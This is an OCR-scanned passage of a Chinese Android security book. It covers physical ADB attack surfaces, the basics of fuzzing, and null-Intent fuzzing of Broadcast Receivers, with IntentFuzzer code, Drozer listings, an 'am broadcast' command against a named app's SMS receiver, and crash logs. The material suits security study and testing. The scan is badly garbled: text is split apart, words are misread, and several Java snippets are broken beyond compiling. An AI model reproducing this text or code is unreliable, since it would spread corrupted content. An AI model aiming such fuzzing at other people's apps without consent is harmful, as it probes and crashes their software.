或 者 在 目标 手机 中 安装 恶意 软件 。Rowley 的 公共 充电 站 只 是 为 了 引起 公众 对 这 些 威胁 的 重视 ， 
而 一 个 恶意 攻击 者 就 不 会 这 么 仁慈 了 。Kyle Osborn， 以 及 后 来 的 Michael Miiller， 都 开发 了 使 用 
ADB 来 下 载 目标 数据 的 工具 。Kyle Osborn 的 工具 特别 设计 来 在 攻击 者 的 Android 设备 上 运行 ， 
实施 “物理 隐蔽 强迫 ”攻击 。 在 这 种 攻击 场景 中 ,攻击 者 在 目标 不 注意 的 时 候 , 将 攻击 者 设备 连 
接 到 目标 设备 上 ,从 中 窃取 最 为 敏感 的 数据 。 整 个 过 程 通常 上 只 需 要 很 短 的 时 间 ， 这 让 这 种 攻击 异 
常 高 效 。 值 得 庆幸 的 是 ，Android 的 后 期 版 本 中 默认 对 ADB 增加 了 认证 。 这 显著 地 缓解 了 这 种 类 
型 的 攻击 ， 但 并 没有 完全 消除 ADB 攻击 面 。 


5.6.3 ”其 他 物理 攻击 面 


尽管 USB 是 Android 设备 上 最 普遍 存在 的 物理 攻击 面 ， 但 它 并 不 是 唯一 的 一 个 。 其 他 物理 
攻击 面包 括 手机 SIM 卡 、SD 卡 、HDMI、 暴 露 的 测试 点 和 对 接连 接 需 等 。Android 系统 中 通过 各 
种 不 同类 型 的 软件 ( 从 内 核 驱动 到 Android 框架 层 API ) 来 提供 对 所 有 这 些 接口 的 支持 。 探 索 这 
些 接口 之 下 的 攻击 面 超出 了 本 章 的 范围 ， 留 给 感 兴趣 的 读者 去 练习 。 


5.7 第 三 方 修改 


第 1 章 介绍 过 ， 许 多 参与 生产 Android 设备 的 实体 会 修改 操作 系统 的 不 同 组 成 部 分 。 比 如 ， 
OEM 倾 向 于 在 他 们 的 整合 过 程 中 对 系统 进行 大 量 的 修改 -OEM 进行 的 修改 已 经 不 限于 某 个 区 域 ， 
而 是 倾向 于 深度 定制 整个 系统 。 例 如 ， 许 多 OEM 会 在 他 们 的 版 本 中 捆绑 一 些 特别 的 应 用 ， 如 提 
高 效率 的 工具 。 一 些 OEM 甚至 将 他 们 的 特性 实现 在 Android 框架 层 中 ， 并 在 系统 中 的 各 个 位 置 
使 用 。 所 有 这 些 第 三 方 修改 都 可 能 会 扩大 设备 的 攻击 面 ， 而 这 种 情况 确实 经 常 发 生 。 

确定 这 些 修改 的 范围 和 本 质 是 一 个 非常 困难 的 过 程 , 而 且 绝 大 部 分 都 需要 手工 分 析 。 一 般 需 
要 将 待 分 析 的 设备 与 Nexus 设备 进行 对 比 。 正 如 在 第 2 章 所 提 到 的 ， 大 多 数 设 备 有 着 许多 原生 
Android 设备 中 没有 的 运行 进程 ， 通 过 比较 两 个 设备 的 ps 命令 输出 和 文件 系统 内 容 ， 可 以 展示 
出 许多 差异 。init 进程 的 配置 文件 在 这 里 很 有 帮助 。 审 查 对 Android 框架 层 的 修改 则 需要 处 理 
Dalv 站 代码 的 专业 工具 。 定 位 到 这 些 差异 后 ,发 现 由 这 些 软件 引入 的 额外 攻击 面 是 相当 烦琐 的 工 
作 ， 通 常 需要 花 许多 个 小 时 来 进行 逆向 工程 与 分 析 。 

























































































5.8 小 结 


本 章 探索 了 Android 设备 可 能 被 攻击 的 所 有 不 同 途 径 , 讨论 了 如 何 根据 可 应 用 的 攻击 向 量 和 
攻击 面 的 不 同属 性 对 研究 工作 进行 优先 级 排序 。 
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通过 根据 访问 复杂 性 将 Android 的 攻击 面 分 成 4 个 高 层 分 类 ， 本 章 分 别 深入 到 每 种 攻击 面 的 
底层 细节 中 ， 涉 及 了 不 同类 型 的 相 邻 条 件 对 可 用 攻击 方法 的 影响 。 

本 章 也 讨论 了 一 些 已 知 的 攻击 方法 , 并 介绍 了 一 些 可 用 来 进一步 探索 Android 攻击 面 的 工具 
和 技术 。 特 别 是 ， 你 学 到 了 如 何 识别 Android 设备 上 暴露 的 端点 ， 如 网 络 服务 、 本 地 IPC 功能 和 
USB 接口 等 。 

由 于 Android 代码 规模 庞大 ， 本 章 不 可 能 详尽 地 分 析 Android 的 整个 攻击 面 ， 因 此 我 们 鼓励 
你 应 用 并 扩展 本 章 展示 的 技术 方法 进一步 探索 。 

下 一 章 将 对 本 章 中 提 及 的 一 些 概 念 进行 扩展 , 并 进一步 探索 几 个 特定 的 攻击 面 , 还 将 介绍 如 
何 利 用 模糊 测试 ( fuzzing ) 方法 来 发 现 安全 漏洞 。 
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模糊 测试 ( fuzz testing )， 或 称 fuzzing， 是 一 种 通过 构造 畸形 输入 ， 来 测试 软件 输入 验证 的 
方法 。 本 章 将 就 模糊 测试 展开 详细 讨论 。 本 章 会 介绍 模糊 测试 的 起 源 ， 并 解释 各 种 相关 任务 的 细 
微 差别 。 模糊 测试 包含 目标 识别 、 输 入 构造 、 系 统 自 动 化 和 结果 监控 等 步骤 。 最 后 ， 本 章 会 围绕 
本 书写 作 时 测试 的 三 个 模糊 测试 工具 ,来 分 别 曾 述 它们 各 自 不 同 的 方法 、 挑 战 和 考虑 因素 。 这 些 
例子 会 向 你 展示 使 用 fuzzing 技术 来 挖掘 漏洞 是 多 么 容易 。 读 完 本 章 后 ， 相 信 你 一 定 会 很 好 地 理 
解 模 糊 测试 ， 并 使 用 这 一 技术 来 找到 隐藏 在 Android 系统 中 的 漏洞 。 


6.1 模糊 测试 的 背景 


模糊 测试 拥有 很 长 的 历史 , 并 且 被 证 明 能 够 有 效 地 找到 漏洞 。 这 一 技术 最 初 是 由 威斯康星 大 
学 麦迪 了 还 分 校 的 Barton Miller 教授 在 1988 年 提出 ， 当 时 仅仅 是 作为 一 个 课程 项 目 来 测试 各 种 
UNIX 系统 工具 的 错误 。 而 在 现代 信息 安全 领域 中 ， 模 糊 测试 已 经 成 为 安全 专家 和 开发 者 审计 软 
件 输入 验证 的 方法 。 事实 上 , 已 经 有 一 些 杰出 的 安全 研究 人 员 就 这 一 主题 写 过 专著 。 这 一 简单 的 
技术 已 经 帮助 人 们 发 现 了 许 许 多 多 的 bug， 其 中 相当 一 部 分 是 安全 漏洞 。 

模糊 测试 的 基本 前 提 是 使 用 自动 化 的 方法 测试 尽 可 能 多 的 可 达 程 序 路 径 。 处 理 大 量 不 同 的 输 
入 会 触发 分 支 条 件 的 计算 , 每 次 分 支 决策 可 能 会 导致 软件 执行 包含 错误 或 无 效 假设 的 代码 。 因 此 
在 模糊 测试 中 ， 到 达 更 多 的 执行 路 径 意 味 着 更 有 可 能 找到 bug。 

模糊 测试 能 够 在 安全 研究 社区 流行 有 很 多 原因 。 模糊 测试 最 吸引 人 的 一 点 也 许 是 其 所 具有 的 
自动 化 这 个 本 质 特 点 。 研 究 人 员 只 要 开发 出 一 个 模糊 测试 工具 就 能 使 其 长 期 运行 , 而 自己 可 以 去 
做 其 他 工作 ， 如 审计 或 道 向 工程 等 。 此 外 ,开发 一 个 简单 的 模糊 测试 工具 只 需要 很 少 的 时 间 , 万 
其 是 相 比 人 工 审计 二 进 制 或 源 代 码 而 言 。 一 些 模 糊 测试 框架 进一步 减少 了 研究 人 员 所 需 的 的 精力 
投入 。 而 且 , 使 用 模糊 测试 找到 的 bug 数量 远 超 人 工 审计 。 所 有 这 些 优 势 都 预示 着 模糊 测试 将 会 
长 期 存在 。 

尽管 有 如 此 多 的 优势 ,模糊 测试 也 并 非 完美 。 首 先 ， 它 只 能 找到 缺陷 ， 而 找到 的 缺陷 是 否 属 
于 安全 问题 还 需要 研究 人 员 进 一 步 分 析 ， 关 于 这 个 问题 将 在 第 7 章 详 细 介绍 。 其 次 ,模糊 测试 也 
有 局 限 。 考 虑 使 用 模糊 测试 来 测试 16 字 节 的 输入 ， 相 比 其 他 文件 格式 来 说 ， 这 算是 很 小 的 输入 
了 。 因 为 每 个 字 节 有 255 种 可 能 值 ， 所 以 整个 输入 集合 包含 319 626 579 315 078 487 616 775 634 
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918 212 890 625 种 可 能 值 。 测 试 如 此 庞大 的 输入 集合 ， 使 用 现在 的 技术 是 完全 不 可 能 的 。 最 后 ， 
有 漏洞 的 代码 有 时 候 即 便 被 执行 了 , 也 可 能 检测 不 到 , 如 发 生 在 一 个 不 重要 的 缓冲 区 中 的 内 存 损 
坏 。 尽 管 有 以 上 这 些 问题 ， 模 糊 测试 仍然 十 分 有 用 。 
相 比 整个 信息 安全 社区 ， 模 糊 测 试 在 Android 生态 圈 中 并 没有 受到 太 多 的 关注 。 尽 管 有 人 公 
开 表 示 过 对 模糊 测试 Android 系统 有 兴趣 ， 但 很 少 有 人 公开 谈论 他 们 具体 做 了 哪些 相关 的 工作 ， 
屈指 可 数 的 几 个 公开 演讲 也 仅仅 关注 单一 且 有 限 的 攻击 面 。 除 此 之 外 , 截止 到 写作 本 书 之 时 ,还 
没有 直接 针对 Android 的 模糊 测试 框架 。 整 体 上 来 讲 ，Android 设备 上 暴露 的 大 量 攻击 面 还 远 远 
没有 被 测试 。 
对 目标 应 用 做 一 次 成 功 的 模糊 测试 ， 需 要 完成 以 下 4 个 步骤: 
口 选 定 目标 ; 
口 生成 输入 ; 
口 传递 测试 用 例 ; 
口 监控 朋 演 。 
模糊 测试 的 首要 步骤 是 确定 一 个 目标 , 剩 下 的 3 个 步 又 很 大 程度 上 取决 于 第 一 个 。 选 定 目标 
后 , 可 以 有 多 种 不 同 的 方式 来 生成 输入 ， 如 通过 对 合法 的 输入 进行 变异 处 理 , 或 者 完全 重新 构造 
整个 输入 。 然 后 ， 这 些 构造 的 输入 必须 按照 选 定 的 攻击 向 量 和 攻击 面 传递 给 目标 软件 。 最 后 , 采 
用 监控 崩 演 的 方式 来 识别 异常 行为 。 接 下 来 几 节 将 深入 讨论 这 4 个 步骤 。 










































































6.1.1 选 定 目标 


构造 有 效 的 模糊 测试 工具 的 首要 步骤 是 选 定 一 个 目标 。 如 果 时 间 紧 迫 ， 随 便 选 择 一 个 也 未 学 
不 可 , 而 用 心 的 选择 则 需要 考虑 很 多 因素 , 如 分 析 程序 的 复杂 度 、 实 现 的 难度 、 研 究 人 员 的 经 验 、 
攻击 向 量 和 攻击 面 等 。 一 个 熟悉 、 复 杂 且 攻击 面 易于 到 达 的 对 象 是 理想 的 测试 目标 。 然 而 ,多 花 
些 精力 去 测试 那些 攻击 面 难以 到 达 的 对 象 能 找到 一 般 情 况 下 发 现 不 了 的 bug。 在 目标 选择 上 所 付 
出 精力 的 多 少 最 终 取决 于 研究 人 员 , 但 是 需要 考虑 最 小 的 攻击 向 量 和 攻击 面 。 由 于 Android 的 攻 
击 面 非常 大 (第 5 章 讨 论 过 )， 其 中 有 许多 适合 用 来 进行 模糊 测试 的 潜在 目标 。 


6.1.2 ”构造 畸形 输入 


构造 输入 是 模糊 测试 过 程 中 变化 最 多 的 一 步 。 回 忆 前 面 介绍 的 内 容 , 要 遍历 所 有 的 输入 集合 ， 
即便 对 于 16 字 节 也 是 不 可 能 的 。 为 此 ， 研 究 人 员 使 用 了 几 种 不 同类 型 的 模糊 测试 方法 在 广阔 的 
输入 空间 中 找到 bug。 对 模糊 测试 工具 的 分 类 很 大 程度 上 取决 于 用 来 生成 输入 的 方法 。 每 种 模糊 
测试 方法 都 各 有 优 缺 点 ,并 且 会 产生 不 同 的 结果 。 除 了 模糊 测试 方法 有 不 同 的 类 型 ， 生成 输入 也 
有 两 种 不 同 的 方法 。 

最 流行 的 模糊 测试 类 型 叫做 非 智 能 模糊 测试 ( dumb-fuzzing ), 在 这 种 方式 下 , 输入 的 生成 并 
不 考虑 输入 的 语义 信息 ， 耗 费 的 开发 时 间 很 敌 ， 因 为 不 要 求 研究 人 员 深 入 理解 输入 数据 。 然 而 ， 
这 也 意味 着 在 分 析 发 现 的 bug 时 ， 需 要 更 多 的 努力 才能 理解 其 根本 原因 。 从 本 质 上 来 说 ,节省 的 
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研究 成 本 很 多 只 是 被 延迟 到 了 发 现 潜在 安全 问题 之 后 。 采 用 非 智 能 模糊 测试 的 方式 生成 输入 , 安 
全 人 研究 人 员 将 各 种 不 同 的 变异 (mnutation ) 技术 用 在 有 效 的 输入 上 。 最 常见 的 变异 手段 包括 将 输 
人 数据 中 的 一 个 随机 字 节 改 为 一 个 随机 值 等 。 令 人 惊讶 的 是 , 基于 变异 的 非 智能 模糊 测试 发 现 了 
非常 多 的 bag， 无怪 乎 它 会 成 为 最 流行 的 模糊 测试 类 型 。 

智能 模糊 测试 ( smart-fuzzing ) 是 另 一 种 流行 的 模糊 测试 技术 。 从 名 字 就 可 以 看 出 ， 智 能 模 
糊 测 试 在 输入 生成 上 需要 更 加 智能 一 些 。 虽然 不 同 的 情形 下 智能 的 程度 不 一 , 但 理解 输入 的 数据 
格式 都 是 最 重要 的 。 智能 模糊 测试 尽管 初期 需要 更 多 的 投入 , 但 会 在 很 大 程度 上 受益 于 研究 人 员 
的 直觉 和 分 析 结 果 。 例 如 , 在 消除 不 必要 地 遍历 不 感 兴趣 的 代码 路 径 时 ,学 习 解析 器 的 代码 结构 
可 以 极 大 地 提高 代码 的 覆盖 率 。 虽然 智能 模糊 测试 也 可 以 用 变异 的 方式 来 生成 输入 , 但 是 它 主 要 
依赖 生成 式 方法 ( generative method ), 这 种 方法 通常 使 用 基于 输入 数据 格式 的 自 定义 程序 或 语法 ， 
从 零 开 始 生 成 整个 输入 。 可 以 说 ,智能 模糊 测试 比 非 智能 模糊 测试 更 有 可 能 发 现 安全 漏洞 ,尤其 
是 对 于 那些 经 受 住 智能 模糊 测试 的 比较 成 熟 的 目标 。 
两 种 模糊 测试 方法 可 以 混合 起 来 使 用 ， 这 样 可 以 生成 任何 一 种 单一 方法 不 可 能 生成 的 输入 。 
将 输入 解析 成 不 同 的 数据 结构 ， 然 后 在 不 同 的 逻辑 层面 进行 变异 ,会 是 一 种 强大 的 技术 。 一 个 很 
好 的 例子 是 , 用 一 个 生成 的 子 树 来 奉 换 DOM 树 的 一 个 或 几 个 HTML 节点 。 一 个 使 用 解析 器 的 混 
合 方法 能 够 将 模糊 测试 限定 在 输入 中 的 一 些 选 定 字 段 或 区 域 。 

无 论 采 用 哪 种 模糊 测试 方法 ， 研 究 人 员 都 会 使 用 各 种 各 样 的 技术 来 提高 输入 生成 的 有 效 性 。 
一 个 小 的 技巧 是 , 测试 整数 输入 时 优先 使 用 更 容易 造成 问题 的 输入 ,如 使 用 较 大 的 2 的 乘 方 。 另 
外 一 个 技术 是 ,， 尽 可 能 去 做 那些 容易 产生 问题 的 变异 ， 而 避免 那些 不 容易 产生 问题 的 变异 。 值 得 
注意 的 是 ， 不 要 修改 消息 完整 性 的 数据 或 一 些 幻 数 ( Magic Number )， 否 则 会 降低 代码 覆盖 率 。 
此 外 ,需要 对 一 些 上 下 文 相 关 的 长 度 值 进行 调整 ， 以 绕 过 目标 软件 中 的 健全 性 检查 。 如 果 发 现 的 
缺陷 无 法 解释 ， 就 意味 着 测试 失去 意义 ， 只 能 造成 资源 的 浪费 。 以 上 这 些 都 是 模糊 测试 工具 开发 
者 在 生成 输入 的 时 候 需要 考虑 的 问题 。 


6.1.3 “处理 输入 


畸形 输入 构造 完成 后 , 下 一 步 就 是 把 这 些 输 入 交 给 目标 软件 去 处 理 。 如 果 目 标 软件 不 处 理 这 
些 输入 ， 就 意味 着 目标 代码 没有 被 测试 ， 也 就 不 可 能 找到 bug。 处 理 输 入 是 模糊 测试 的 最 大 优 
势 一 一 自动 化 的 基础 。 目 标 是 能 够 自动 地 、 反 复 地 把 构造 的 输入 传递 给 目标 软件 。 

输入 的 传递 方式 取决 于 目标 软件 的 攻击 向 量 。 模 糊 测试 一 个 基于 socket 的 服务 需要 发 送 数据 
包 , 还 可 能 需要 建立 和 关闭 会 话 。 测 试 一 个 文件 格式 需要 写 出 并 打开 构造 的 输入 文件 。 寻 找 客户 
端 软件 的 漏洞 则 需要 自动 进行 复杂 的 用 户 交 互 ， 如 打开 一 封 电子 邮件 。 这 仅仅 是 一 些 例子 。 几 乎 
所 有 依赖 于 网 络 的 通信 都 有 暴露 潜在 漏洞 的 可 能 。 当 然 有 更 多 的 攻击 方式 存在 , 每 种 都 有 自身 的 
输入 处 理 考量 。 

类 似 于 生成 输入 , 也 有 提高 处 理 输入 效率 的 方法 。 一 些 模 糊 测试 工具 会 通过 像 攻 击 者 一 样 传 
递 输入 来 完全 模拟 一 次 攻击 , 另 一 些 则 会 让 目标 软件 在 调用 栈 的 底层 处 理 输入 来 提高 性 能 , 还 有 
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的 会 避免 往 很 慢 的 永久 存储 设备 写 和 人， 而 将 数据 留 在 内 存 中 。 这 些 技术 都 能 大 幅 提 高 测试 速度 ， 
但 也 都 有 代价 。 在 底层 做 模糊 测试 得 到 的 结果 可 能 在 真实 的 攻击 环境 中 无 法 重 现 , 这 样 就 产生 了 
误 报 。 遗 憾 的 是 ， 有 些 发 现 并 不 是 安全 问题 ， 处 理 起 来 非常 枯燥 繁琐 。 








6.1.4 监控 结果 


模糊 测试 的 第 四 步 是 监控 测试 结果 。 如 果 不 去 观测 那些 非 预期 行为 ， 就 不 可 能 知道 你 是 否 
发 现 了 一 个 安全 问题 。 一 个 测试 可 以 得 到 很 多 可 能 的 结果 ， 如 成 功 的 处 理 、 中 止 、 程 序 或 系统 
骨 溃 ， 以 及 测试 系统 的 永久 破坏 等 。 如 果 不 考虑 那些 异常 情况 ， 则 会 导致 你 的 模糊 测试 工具 停 
止 运行 ,这 样 就 无 法 做 到 无 需 人 为 参与 。 记 录 和 报告 统计 数据 有 助 于 快速 了 解 模糊 测试 工具 的 
运行 状况 。 

就 像 构造 输入 和 处 理 输入 那样 , 也 可 以 使 用 很 多 监控 结果 的 选项 。 一 种 快速 是 粗略 的 方式 是 
只 去 监控 那些 系统 日 志 里 的 非 预期 事件 。 测 试 过 程 中 发 生前 溃 时 , 服务 会 停止 响应 或 者 关闭 连接 ， 
观测 这 些 事件 是 另 一 种 监控 测试 的 方式 。 可 以 使 用 调试 器 来 获取 骨 省 时 更 为 细 粒 度 的 信息 ( 如 寄 
存 器 的 值 )， 也 可 以 使 用 插 桩 工具 ( 如 valgrind ) 来 观测 非 正 常 行为 。 函 数 截获 ( API hooking ) 
也 是 一 种 有 用 的 技术 ， 尤 其 是 使 用 模糊 测试 来 寻找 非 内 存 破 坏 漏洞 时 。 如 果 这 些 方法 全 部 失效 ， 
你 可 以 构建 自 定义 的 软 硬 件 来 克服 几乎 所 有 在 监控 上 遇 到 的 问题 。 


6.2 Android 上 的 模糊 测试 


Android 系统 上 的 模糊 测试 与 其 他 Linux 系统 上 的 非常 相似 。 如 果 你 熟悉 UNIX 工具 ， 如 
ptrace、 管 道 、 信 号 ， 以 及 其 他 POSIX 标准 概念 ， 将 会 非常 有 帮助 。 得 益 于 操作 系统 的 进程 隔 
离 特性 ， 对 一 个 程序 做 模糊 测试 时 ， 对 整个 系统 产生 副作用 的 风险 是 相对 较 小 的 。 使 用 这 些 工具 
可 能 会 开发 出 带 有 集成 调试 器 等 的 高 级 模糊 测试 工具 。 尽 管 有 这 些 便利 ， 对 Android 设备 进行 模 
糊 测试 依然 存在 一 些 挑战 。 

模糊 测试 ， 或 者 更 广泛 的 软件 测试 , 是 一 项 复杂 的 课题 。 很 多 不 确定 的 因素 会 使 测试 产生 错 
误 。 对 于 Android， 那 些 非 Linux 的 组 件 使 这 一 复杂 度 又 提高 了 。 软 人 硬件 的 看 门 狗 还 可 能 会 让 设 
备 重启 。 为 了 实现 最 小 权限 原则 ，Android 系统 中 的 程序 通常 会 互相 依赖 ， 如 果 去 测试 那些 有 依 
赖 关系 的 程序 ， 则 可 能 导致 多 个 进程 骨 溃 。 在 底层 硬件 中 实现 的 功能 性 依赖 〈 如 视频 解码 )， 会 
导致 系统 锁定 或 程序 发 生 故 障 。 上 述 问题 的 发 生 都 将 导致 模糊 测试 终止 。 因 此 ， 要 想 开发 一 个 健 
壮 的 模糊 测试 工具 ， 就 必须 解决 好 这 些 问题 都 。 

Android 设备 还 面临 着 另外 一 个 问题 : 性 能 。 大 多 数 Android 设备 要 明显 慢 于 传统 的 x86 机 
器 。 即 便 使 用 顶级 配置 的 宿主 机 ，Android SDK 中 提供 的 仿真 器 通常 比 物理 设备 更 慢 。 尽 管 充 分 
健壮 和 自动 化 的 模糊 测试 工具 可 以 在 无 人 监管 的 情况 下 很 好 地 运行 , 但 是 较 低 的 性 能 依然 会 影响 
测试 效率 。 

除了 计算 性 能 ， 通 信 速 度 也 会 带 来 问题 。 一 般 Android 设备 上 只 有 USB 和 Wi-Fi 两 个 通道 ， 
少数 设备 还 会 有 串口 , 但 串口 速度 更 慢 。 这 些 通信 方式 在 传输 文件 或 频繁 发 送 命令 的 时 候 性 能 都 
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不 是 很 好 。 在 ARM 设备 的 节能 模式 下 ， 如 屏幕 关闭 时 ，Wi-Fi 的 表现 将 变 得 非常 糟糕 。 鉴 于 这 
些 问题 ， 如 果 能 将 传人 和 传 出 设备 的 数据 量 减 到 最 小 ， 那 将 会 是 非常 有 好 处 的 。 

尽管 有 这 些 性 能 问题 ,直接 在 Android 真 机 上 进行 模拟 测试 还 是 要 比 使 用 仿真 器 好 得 多 。 就 
像 前 面 提 到 的 ， 物 理 设备 通常 运行 的 是 OEM 定制 的 Android 系统 。 如 果 模 糊 测试 的 目标 代码 被 
厂商 修改 过 , 那么 测试 结果 将 会 不 同 。 即 便 三 商 没 有 修改 代码 ,物理 设备 依然 会 有 一 些 仿真 器 所 
没有 的 代码 ， 如 外 设 的 驱动 和 专 有 软件 等 。 模糊 测试 的 结果 可 能 会 跟 设备 或 设备 系列 相关 ， 因此 
在 仿真 器 上 进行 模拟 测试 是 不 够 的 。 














6.3 对 Broadcast Receiver 进行 模糊 测试 


第 4 章 讲 过 ，Broadcast Receiver 和 其 他 进程 间 通 信 (了 PC ) 端点 均 为 应 用 中 有 效 的 输入 点 ， 
它们 的 安全 性 和 健壮 性 往往 被 忽视 。 无 论 第 三 方 应 用 还 是 官方 Android 组 件 都 可 能 存在 这 样 的 问 
题 。 这 一 节 将 会 介绍 一 个 针对 Broadcast Receiver 的 非常 初级 和 简单 的 模糊 测试 方法 : 空 Intent 
fuzzing。 这 一 技术 最 早 是 iSEC Partners 公司 于 2010 年 在 IntentFuzzer 中 实现 的 。 尽 管 除 了 
IntentFuzzer 的 最 初 发 布 ， 这 一 方法 没有 做 得 到 什么 宣传 推广 ， 但 是 它 可 以 帮 你 快速 找到 目标 ， 
并 且 引 导 你 开发 更 专注 、 更 智能 的 模糊 测试 工具 。 




































































6.3.1 选 定 目标 


首先 ， 你 需要 找到 某 款 应 用 或 整个 系统 中 哪些 Broadcast Receiver 已 经 被 注册 。 你 可 以 使 用 
PackageManager 类 来 查找 系统 中 已 经 安装 的 应 用 ,以 及 它们 导出 的 接收 者 ,下 面 是 IntentFuzzer 
中 的 一 个 代码 片段 (有 少量 修改 ): 


protected ArrayList<ComponentName> getExportedComponents() { 
ArrayList<ComponentName> found = new ArrayList<ComponentName> () ; 
PackageManager pm = getPackageManager (); 
for (PackageInfo pi : pm 
.getInstalledPackages (PackageManager .GET_DISABLED_ COMPONENTS 
| PackageManager .GET_ RECEIVERS) { 
PackageItemInfo items{[] = null; 
if (items != null) 
for(PackageItemInfo pii : items) 
found.add (new ComponentName (pi .packageName, pii.name)); 
return found; 





























} 
getPackageManager 方法 返回 一 个 PackageManager 对 象 pmo 然后 调用 getInstalled 
Packages 方法 ， 在 过 滤 选 项 中 只 选择 Broadcast Receiver， 得 到 的 返回 数组 foung 中 包含 了 包 
名 和 组 件 名 。 
还 可 以 使 用 Drozer 来 列举 目标 应 用 或 整个 目标 设备 中 的 Broadcast Receiver， 类 似 于 第 4 章 
的 介绍 。 下面 的 代码 片段 分 别 列举 了 系统 中 的 所 有 BroadcastReceiver 和 应 用 com.yougetitback. 


androidapplication.virgin.mobile 中 的 Broadcast Receiver。 
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dz> run app.broadcast.info 
Package: android 
Receiver: com.android.server.BootReceiver 
Permission: null 
Receiver: com.android.server.MasterClearReceiver 
Permission: android.permission.MASTER_ CLEAR 


Package: com.amazon.kindle 

Receiver: com.amazon.kcp.redding.MarketReferralTracker 
Permission: null 

Receiver: com.amazon.kcp.recommendation.CampaignWebView 
Permission: null 

Receiver: com.amazon.kindle.StandaloneAccountAddTracker 
Permission: null 

Receiver: com.amazon.kcp.reader.ui.StandaloneDefinitionContainerModule 
Permission: null 


dz> run app.broadcast.info -a \ 
com.yougetitback.androidapplication.virgin.mobile 
Package: com.yougetitback.androidapplication.virgin.mobile 
Receiver: com.yougetitback.androidapplication.settings.main.Entranc... 
Permission: android.permission.BIND DEVICE_ ADMIN 
Receiver: com.yougetitback.androidapplication.MyStartupIntentReceiver 
Permission: null 
Receiver: com.yougetitback.androidapplication.SmsIntentReceiver 
Permission: null 
Receiver: com.yougetitback.androidapplication.IdleTimeout 
Permission: null 
Receiver: com.yougetitback.androidapplication.PingTimeout 

















6.3.2 ”生成 输入 


想 要 理解 给 定 输入 ( 比如 一 个 Intent 接收 者 ) 期 望 或 者 能 够 处 理 什 么 , 通常 需要 拿 到 一 个 基 
本 的 测试 样 例 ， 或 者 去 分 析 接 收 者 本 身 。 第 4 章 逐 步 分 析 了 一 个 目标 应 用 ,包含 一 个 特别 的 
BroadcastReceiver 在 内 。 只 要 知道 进程 间 通 信 的 本 质 , 无 须 花费 很 多 时 间 就 可 以 实现 目标 。 你 只 
需要 构造 一 个 不 包含 其 他 任何 属性 ( extras、flag 和 URI 等 ) 的 显 式 Intent 对 象 。 参照 ntentFuzzer 
中 的 以 下 代码 片段 : 

protected :int fuzzBR(List<ComponentName> comps) { 
nt Count &: ,0% 
for (int i = 0; i < comps.size(); i++) { 


Intent in = new Intent(); 
in.setComponent (comps .get (i)); 


























在 上 述 代 码 片段 中 ，fuzzBR 方法 接收 一 个 组 件 名 列表 作为 参数 并 依次 迭代 每 一 个 组 件 名 ， 
每 次 迭代 都 会 创建 一 个 Intent 对 象 并 调用 setcomponent 将 相应 组 件 设置 为 发 送 目 标 。 
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6.3.3 ”传递 输入 


传递 mtent 只 需 调 用 sendBroadcast 方法 并 传人 Intent 对 象 即 可 。 下 列 代 码 实现 了 这 一 算 
法 ， 在 之 前 的 代码 片段 的 基础 上 进行 了 扩展 。 


protected int fuzzBR(List<ComponentName> comps) { 
Tmt -COUnt = 0 
for (int i = 0; i < comps.size(); i++) { 
Intent in = new Intent(); 
in.setComponent (comps .get (i)); 
sendBroadcast (in); 
Count++; 





} 
return count; 


} 
也 可 以 使 用 am broagcast 命令 来 达到 同样 的 效果 。 下 面 是 一 个 使 用 这 个 命令 的 例子 。 


$ am broadcast -n com.yougetitback.androidapplication.virgin.mobile/co\ 
m.yougetitback.androidapplication.SmsIntentReceiver 


使 用 am broadcast 命令 时 ， 只 需 用 -n 选项 传人 目标 应 用 包 名 和 组 件 名 (这 里 是 Broadcast 
Receiver ) 即 可 。 这 条 命令 会 创建 并 发 送 一 个 空 的 Intent。 这 种 方式 不 仅 可 以 快速 进行 手动 测试 ， 
也 可 以 开发 一 个 shell 脚本 形式 的 模糊 测试 工具 。 





























6.3.4 监控 测试 


Android 也 提供 了 一 些 监控 模糊 测试 的 工具 。 可 以 使 用 logcat 来 判断 应 用 是 否 崩 演 。 这 些 
错误 基本 都 是 那些 Java 风格 的 未 处 理 异常 ， 如 空 指针 异常 NullPointerException。 在 下 面 的 
例子 中 ， 你 可 以 看 到 smsIntentReceiver 这 个 Broadcast Receiver 并 没有 验证 接收 到 的 Intent 
及 其 属性 ， 并 且 没 有 很 好 地 处 理 异常 。 














E/AndroidRuntime( 568): FATAL EXCEPTION: main 

E/AndroidRuntime( 568): java.lang.RuntimeException: Unable to start 
receiver com.yougetitback.androidapplication.SmsIntentReceiver: 
java.lang.NullPointerException 

E/AndroidRuntime( 568): at 
android.app.ActivityThread.handleReceiver (ActivityThread.java:2236) 
E/AndroidRuntime( 568): at 
android.app.ActivityThread.access$1500 (ActivityThread.java:130) 
E/AndroidRuntime( 568): at 
android.app.ActivityThreads$sH.handleMessage (ActivityThread.java:1271) 
E/AndroidRuntime( 568): at 
android.os.Handler.dispatchMessage (Handler.java:99) 
E/AndroidRuntime( 568): at 

android.os.Looper.loop (Looper.java:137) 

E/AndroidRuntime( 568): at 

android.app.ActivityThread.main (ActivityThread.java:4745) 
E/AndroidRuntime( 568): at 
java.lang.reflect.Method.invokeNative (Native Method) 
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E/AndroidRuntime( 568) : at 

java.lang.reflect.Method.invoke (Method.java:511) 

E/AndroidRuntime( 568): at 
com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit. 
java:786) 

E/AndroidRuntime( 568): at 
com.android.internal.os.ZygoteInit.main(ZygoteInit.java:553) 
E/AndroidRuntime( 568): at 


dalvik.system.NativeStart.main (Native Method |) 

E/AndroidRuntime( 568): Caused by: java.lang.NullPointerException 
E/AndroidRuntime( 568): at 
com.yougetitback.androidapplication.SmsIntentReceiver.onReceive 
(SmsIntentReceiver.java:1150) 








E/AndroidRuntime( 568): at 
android.app.ActivityThread.handleReceiver (ActivityThread.java:2229) 
E/AndroidRuntime( 568): ... 10 more 

















对 于 这 种 方法 ， 即 便 是 OEM 和 谷歌 提供 的 组 件 也 不 能 幸免 。 我 们 用 这 种 方法 对 Nexus S 进行 
了 测试 ， 发 现 包 com.androigd.phone 中 的 组 件 PhoneApp$SNotificationBroadcastReceiver 


接收 者 在 1ogcat 中 输入 了 如 下 日 志 信 息 : 


D/PhoneApp( 5605): Broadcast from Notification: null 





E/AndroidRuntime( 5605): java.lang.RuntimeException: Unable to start 
receiver com.android.phone.PhoneApp$SNotificationBroadcastReceiver: 
java.lang.NullPointerException 

E/AndroidRuntime( 5605): at 
android.app.ActivityThread.handleReceiver (ActivityThread.java:2236) 


W/ActivityManager( 249): Process com.android.phone has crashed too many 
